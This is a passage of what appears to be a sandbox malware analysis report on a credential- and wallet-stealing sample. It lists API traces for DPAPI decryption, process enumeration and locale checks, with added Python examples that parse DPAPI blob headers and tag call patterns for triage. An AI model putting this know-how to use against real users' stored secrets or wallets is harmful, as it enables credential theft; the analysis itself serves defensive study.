                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: a7adba6e54ab5bfeb70a63fc608e14bd034e49f8f9cd2c2ef1d2802f522892a5
                          • Instruction ID: 0d3a9dd0329f64a185c10cc5a4710af7098305714da30b7be5ee2569f219865c
                          • Opcode Fuzzy Hash: a7adba6e54ab5bfeb70a63fc608e14bd034e49f8f9cd2c2ef1d2802f522892a5
                          • Instruction Fuzzy Hash: 8B4150B590431EDFDB10DFA0DD89BEEB7B8AB48305F1046A8E509A7280DB745A84CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0091724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00917254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00917281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009172A4
                          • LocalFree.KERNEL32(?), ref: 009172AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                          • Instruction ID: c43a6492e15a3e80da8b8ca15701730d179a3ec2890ea7e48b067b63fcb44b2a
                          • Opcode Fuzzy Hash: a6d86ff7ac61dc19d05a4b04a167a484cfb034d701dea96c7181bd86e9d784af
                          • Instruction Fuzzy Hash: 10010075B40308BBDB10DBD4CD45F9D77B8AB44701F104594FB15BB2C0DA70AA018B65
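The CryptStringToBinaryA chain at 0091C87C and the CryptUnprotectData chain at 00917281 are the two halves of reading a DPAPI-protected secret that is stored as base64 text; the report lists the calls in two different functions and does not say the decoded bytes of one feed the other, so that pairing is an assumption of this example. The Python below is an added example, not code from the sample and not part of the Joe Sandbox report. It performs the decode that CryptStringToBinaryA does with CRYPT_STRING_BASE64 (0x1), then walks the blob header that CryptUnprotectData consumes: it checks the fixed DPAPI provider GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB} and recovers the master-key GUID, which is the file name under the user's %APPDATA%\Microsoft\Protect\<SID>\ folder that an analyst needs in order to decrypt the blob offline. The blob layout follows the publicly documented DPAPI format (the one dpapick and mimikatz parse); the sample blob and its GUID are constructed inside the block and carry no real secret.

```python
"""Base64-decode a DPAPI blob as CryptStringToBinaryA(CRYPT_STRING_BASE64) does,
then parse the header that CryptUnprotectData consumes to recover the master-key
GUID.  Added example; the sample blob below is constructed, not taken from a host."""
import base64
import struct
import uuid
from typing import Dict

# Every DPAPI blob starts with dwVersion == 1 followed by this provider GUID
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES",
             0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}


class _Reader:
    """Sequential little-endian reader with bounds checks."""
    def __init__(self, data: bytes) -> None:
        self.data, self.pos = data, 0

    def raw(self, n: int) -> bytes:
        if n < 0 or self.pos + n > len(self.data):
            raise ValueError("truncated DPAPI blob")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u32(self) -> int:
        return struct.unpack("<I", self.raw(4))[0]

    def lv(self) -> bytes:          # DWORD length followed by that many bytes
        return self.raw(self.u32())


def parse_dpapi_blob(blob: bytes) -> Dict[str, object]:
    """Walk the blob header; raises ValueError for anything that is not a DPAPI blob."""
    r = _Reader(blob)
    version = r.u32()
    provider = uuid.UUID(bytes_le=r.raw(16))
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    mk_version = r.u32()
    mk_guid = uuid.UUID(bytes_le=r.raw(16))          # names the master key file
    flags = r.u32()
    description = r.lv().decode("utf-16-le").rstrip("\0")
    alg_crypt, key_bits = r.u32(), r.u32()
    salt = r.lv()
    r.lv()                          # pbHmacKey, empty in ordinary blobs
    alg_hash, hash_bits = r.u32(), r.u32()
    r.lv()                          # pbHmac2Key, empty in ordinary blobs
    ciphertext = r.lv()
    sign = r.lv()
    if r.pos != len(blob):
        raise ValueError("trailing bytes after DPAPI signature")
    return {
        "master_key_guid": str(mk_guid), "master_key_version": mk_version,
        "flags": flags, "description": description,
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)), "key_bits": key_bits,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)), "hash_bits": hash_bits,
        "salt_len": len(salt), "ciphertext_len": len(ciphertext), "sign_len": len(sign),
    }


def is_dpapi_blob(blob: bytes) -> bool:
    try:
        parse_dpapi_blob(blob)
        return True
    except ValueError:
        return False


def decode_base64(text: str) -> bytes:
    """Strict equivalent of CryptStringToBinaryA with CRYPT_STRING_BASE64."""
    return base64.b64decode(text.strip(), validate=True)


def decode_and_parse(b64_text: str) -> Dict[str, object]:
    return parse_dpapi_blob(decode_base64(b64_text))


# --- constructed sample blob (AES-256 / SHA-512 are the modern DPAPI defaults) ---
def _lv(b: bytes) -> bytes:
    return struct.pack("<I", len(b)) + b


def build_blob(mk_guid: uuid.UUID, description: str, salt: bytes,
               ciphertext: bytes, sign: bytes) -> bytes:
    """Serialise a blob in the documented layout so the parser can be exercised offline."""
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le
            + struct.pack("<I", 1) + mk_guid.bytes_le
            + struct.pack("<I", 0)                          # dwFlags
            + _lv((description + "\0").encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256) + _lv(salt) + _lv(b"")
            + struct.pack("<II", 0x800E, 512) + _lv(b"")
            + _lv(ciphertext) + _lv(sign))


SAMPLE_MK_GUID = uuid.UUID("3f0d1b4e-9c2a-4d5f-8e61-7a2b3c4d5e6f")   # constructed
SAMPLE_B64 = base64.b64encode(build_blob(
    SAMPLE_MK_GUID, "Example", bytes(range(32)), b"\x11" * 48, b"\x22" * 64)).decode()

if __name__ == "__main__":
    for key, value in decode_and_parse(SAMPLE_B64).items():
        print(f"{key:20} {value}")
```

The parser stops at the header on purpose: the ciphertext can only be decrypted with the user's master key (or the domain backup key), so the useful output for triage is the master-key GUID and the algorithm pair, which tell you which key file to collect and what the blob was protected with.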
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0092961E
                          • Process32First.KERNEL32(00930ACA,00000128), ref: 00929632
                          • Process32Next.KERNEL32(00930ACA,00000128), ref: 00929647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0092965C
                          • CloseHandle.KERNEL32(00930ACA), ref: 0092967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                          • Instruction ID: 5a83d954aa12e78b864d5d479f8aa8f2f27aa0fe2de8ffab9d59ecc51205e9e3
                          • Opcode Fuzzy Hash: 61912aa855ab2f452080db22146c88ab8c1f972442d5e261a777cc3ad2b54a95
                          • Instruction Fuzzy Hash: 9B010C75A00318ABCB14DFA5DD58BEDBBF8FB48701F1042C8A909A7240DB349B44CF51
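The API bullet lists in this part of the report (the FindFirstFileA/FindNextFileA walks at 0091DAEB and 0091E4A2, the GetKeyboardLayoutList/GetLocaleInfoA check at 00927BE1, CryptStringToBinaryA at 0091C87C, CryptUnprotectData at 00917281 and the Toolhelp32 process walk at 0092961E) read more easily once the numeric arguments are mapped back to their Win32 constants and the call order is matched as a pattern. The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses bullet lines copied verbatim from this report, annotates the documented constants that appear in them (TH32CS_SNAPPROCESS, the 0x128-byte ANSI PROCESSENTRY32, LOCALE_SLANGUAGE, LPTR, CRYPTPROTECT_UI_FORBIDDEN) and tags each call sequence with a small rule table of this example's own. The process names and locale values the sample compares against are not visible in the report, so none are assumed here.

```python
"""Parse the 'APIs' bullet lines of a Joe Sandbox function entry, name the
documented Win32 constants used as arguments, and tag the behaviour shown.
Added example: the sample traces are copied from this report; the constant
table and the rule set are this example's own."""
import re
from typing import Dict, List, NamedTuple, Optional


class ApiCall(NamedTuple):
    func: str
    module: str
    args: List[str]
    ref: str                # call-site address in the memory dump
    subcall: Optional[str]  # callee address for "Part of subcall function" lines


# One bullet: [Part of subcall function X:] Func.MODULE(args), ref: ADDR
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z0-9_]+)\.([A-Za-z0-9]+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

# (function, zero-based argument index) -> {value: documented Win32 constant}
KNOWN_ARGS = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("Process32First", 1): {0x128: "sizeof(PROCESSENTRY32), ANSI x86"},
    ("Process32Next", 1): {0x128: "sizeof(PROCESSENTRY32), ANSI x86"},
    ("GetLocaleInfoA", 1): {0x2: "LOCALE_SLANGUAGE"},
    ("LocalAlloc", 0): {0x40: "LPTR"},
    ("CryptUnprotectData", 5): {0x1: "CRYPTPROTECT_UI_FORBIDDEN"},
}

# Behaviour rules (this example's own): ordered subsequence of direct API calls
RULES = {
    "process enumeration with name compare":
        ["CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA"],
    "keyboard layout / locale check": ["GetKeyboardLayoutList", "GetLocaleInfoA"],
    "directory walk skipping . and ..":
        ["FindFirstFileA", "StrCmpCA", "StrCmpCA", "FindNextFileA"],
    "base64 decode via CryptStringToBinaryA": ["CryptStringToBinaryA"],
    "DPAPI decrypt via CryptUnprotectData": ["CryptUnprotectData"],
}


def parse_trace(text: str) -> List[ApiCall]:
    """Turn report bullet lines into ApiCall records; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        sub, func, mod, raw_args, ref = m.groups()
        args = [a.strip() for a in raw_args.split(",")] if raw_args.strip() else []
        calls.append(ApiCall(func, mod.upper(), args, ref.upper(),
                             sub.upper() if sub else None))
    return calls


def decode_args(call: ApiCall) -> List[str]:
    """Annotate numeric arguments that match a documented constant."""
    out = []
    for i, arg in enumerate(call.args):
        try:
            value = int(arg, 16)
        except ValueError:          # '?' (not recovered) or an inline string
            out.append(arg)
            continue
        name = KNOWN_ARGS.get((call.func, i), {}).get(value)
        out.append(f"{arg} /* {name} */" if name else arg)
    return out


def _is_subsequence(pattern: List[str], seq: List[str]) -> bool:
    it = iter(seq)
    return all(any(p == s for s in it) for p in pattern)


def match_rules(calls: List[ApiCall]) -> List[str]:
    direct = [c.func for c in calls if c.subcall is None]
    return [name for name, pat in RULES.items() if _is_subsequence(pat, direct)]


def analyze(text: str) -> Dict[str, object]:
    calls = parse_trace(text)
    return {
        "calls": len(calls),
        "behaviours": match_rules(calls),
        "decoded": {c.ref: f"{c.func}({', '.join(decode_args(c))})"
                    for c in calls if c.subcall is None},
    }


# Bullet lines copied from this report (entries at 0092961E and 00927BE1)
SAMPLE_TRACES = {
    "0092961E": """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0092961E
• Process32First.KERNEL32(00930ACA,00000128), ref: 00929632
• Process32Next.KERNEL32(00930ACA,00000128), ref: 00929647
• StrCmpCA.SHLWAPI(?,00000000), ref: 0092965C
• CloseHandle.KERNEL32(00930ACA), ref: 0092967A
""",
    "00927BE1": """\
  • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
• GetKeyboardLayoutList.USER32(00000000,00000000,009305AF), ref: 00927BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00927BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00927C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00927C62
• LocalFree.KERNEL32(00000000), ref: 00927D22
""",
}

if __name__ == "__main__":
    for entry, text in SAMPLE_TRACES.items():
        print(entry, analyze(text))
```

The two-call GetKeyboardLayoutList shape (first call with a zero buffer to get the count, LPTR allocation, second call to fill the list) is the documented way to enumerate installed layouts, and LOCALE_SLANGUAGE returns the localized language name for each one; the rule fires on that shape alone and deliberately does not guess which languages the sample treats as a stop condition.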
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2o<$4F\$>^'$gB={$s__
                          • API String ID: 0-1767298100
                          • Opcode ID: 56511569f446b05eb67512e9d9c271479ef0d185173caced42b7b8f550e77787
                          • Instruction ID: 0ef765fbde70319c99776f8ca52b47ba01c5830910a1ecf0ffa33a57530e512b
                          • Opcode Fuzzy Hash: 56511569f446b05eb67512e9d9c271479ef0d185173caced42b7b8f550e77787
                          • Instruction Fuzzy Hash: C67205F36082009FE704AE2DEC8177ABBE9EF94320F16493DE6C5C7744E67598058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A{+$C23$e{@$f2{|$r![
                          • API String ID: 0-2412079535
                          • Opcode ID: 0566040d0fda3db46f34fae0d2fbd774b57026d9f01097c21d9fd0e6ca515149
                          • Instruction ID: e6d6b324dc9a60ea299cd7a8a0ae89d23129cc466e3b6c45b7439720cf851f7b
                          • Opcode Fuzzy Hash: 0566040d0fda3db46f34fae0d2fbd774b57026d9f01097c21d9fd0e6ca515149
                          • Instruction Fuzzy Hash: C972E8F3A0C604AFE3046E2DDC8567ABBE9EF94620F1A493DE6C4C7344E63598058797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ?|{$tW$wow$W\
                          • API String ID: 0-988627700
                          • Opcode ID: 547d38e6a3dc18ff557f4bf41553164df40291d50b662e6d1925ab404000535c
                          • Instruction ID: 74d954035e4bde1637b4babac325283a08a8c940c28cbffd8f804ce105136ac6
                          • Opcode Fuzzy Hash: 547d38e6a3dc18ff557f4bf41553164df40291d50b662e6d1925ab404000535c
                          • Instruction Fuzzy Hash: 24B207F3A082149FE304AE2DEC8567ABBE5EF94720F16893DEAC4C7744E63558058793
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1>tq$1\ou$L>q<$qY{
                          • API String ID: 0-2118222111
                          • Opcode ID: 172f355cce8d8b559b0c500318d965d6edbcd5f9fe75880a4a0432fd4906680a
                          • Instruction ID: ccf97107b0ac4a9aef3dc9f8d8ac69480dddd845c595b5ae3298a05cf8886689
                          • Opcode Fuzzy Hash: 172f355cce8d8b559b0c500318d965d6edbcd5f9fe75880a4a0432fd4906680a
                          • Instruction Fuzzy Hash: 20B218F3A0C604AFE3046E2DEC8577ABBE5EF94720F164A3DEAC4C3744E93558058696
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009305B7), ref: 009286CA
                          • Process32First.KERNEL32(?,00000128), ref: 009286DE
                          • Process32Next.KERNEL32(?,00000128), ref: 009286F3
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • CloseHandle.KERNEL32(?), ref: 00928761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                          • Instruction ID: 3662cea85cc95627562d292a03bed5972a0cf361349533582b7425140ebe3fe9
                          • Opcode Fuzzy Hash: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                          • Instruction Fuzzy Hash: 2A315E72901228ABCB24DB51EC51FEEB77CEB88700F104199E509A21A4DF346A45CFA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00915184,40000001,00000000,00000000,?,00915184), ref: 00928EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
